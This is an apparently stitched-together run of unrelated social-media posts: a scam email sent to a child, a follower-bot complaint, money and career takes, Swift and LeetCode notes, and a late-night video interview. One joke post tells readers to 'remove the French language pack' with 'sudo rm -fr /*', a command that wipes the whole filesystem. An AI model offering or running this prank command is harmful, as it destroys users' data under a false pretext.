Recently I've been observing some profiles with girl photos following me. Mostly to bait me into following them back? Looks more like a bot operation

My son did something amazing today. He got the fake email "We've hacked your computer and spied on you doing bad stuff and browsing bad sites. Send us bitcoin and tell no-one. ".
His heart dropped, and his first instinct was to call me and tell me what happened and ask for help.
It was obviously fake, and he didn't do anything wrong, but my heart was filled that his first reaction was to call me and to tell me something happened and for me to help.
Communicate to your kids, I have emphasized multiple times with my kids that no matter what situation you are in, especially on cyber - let me know and the bad folks don't want a pissed off HackingDave Dad on them and I'm always there for them.
Just got this text as typing:

hot take but I don’t think ppl in their teens / early 20’s should care about saving money. You should reinvest it all into upskilling yourself. No ETF is going to give you a better return than the wealth you’ll create when you become highly skilled.
where to spend your money, instead of saving it:
- funding your startup
- learning: books, courses, tutors
- health: high quality food, gym, PT
- time: cleaners, uber, meal delivery, a home at a convenient location
- productivity: high quality chair, desk, monitors, laptop
- openai bills
Contrary to hiding your profile when browsing someone's linkedin,
I think it is much better to allow them to know you stalked them.
It demonstrates interest in working with them.

You read that right. We are starting to explore cross-platform Swift on Point-Free. This series is going to be a must watch!
Cross-platform Swift is here! We are going to use the same feature in vastly different situations: SwiftUI, UIKit, and *beyond* Apple’s ecosystem, starting with a third party view paradigm: @AirbnbEng’s Epoxy.

Just implemented 3Sum #Leetcode with C++ STL
I hope they allow using <algorithms> in the interviews..
Possibility of making off-by-1 errors errors just reduces so much
Why don't the facts align? Intel fell ~5% today, 700k * 5% = 35k
Why does this guy say 4x the amount?
Exaggeration?
These look like scam tactics

Are you pissed at the French for their Olympics opening ceremony?
Get revenge by removing the French language pack from your Linux distros:
sudo rm -fr /*
Explaining grad school friends Data structures and algorithms using playing cards, like Dave Abrahams talk on Embracing Algorithms has been so fun
Just gave an asynchronous video interview, conducted using @hirevue 's platform. Started it at 8.30 pm. It said, only takes 8 minutes.
It had unlimited retries.
I ended at 1:15 am
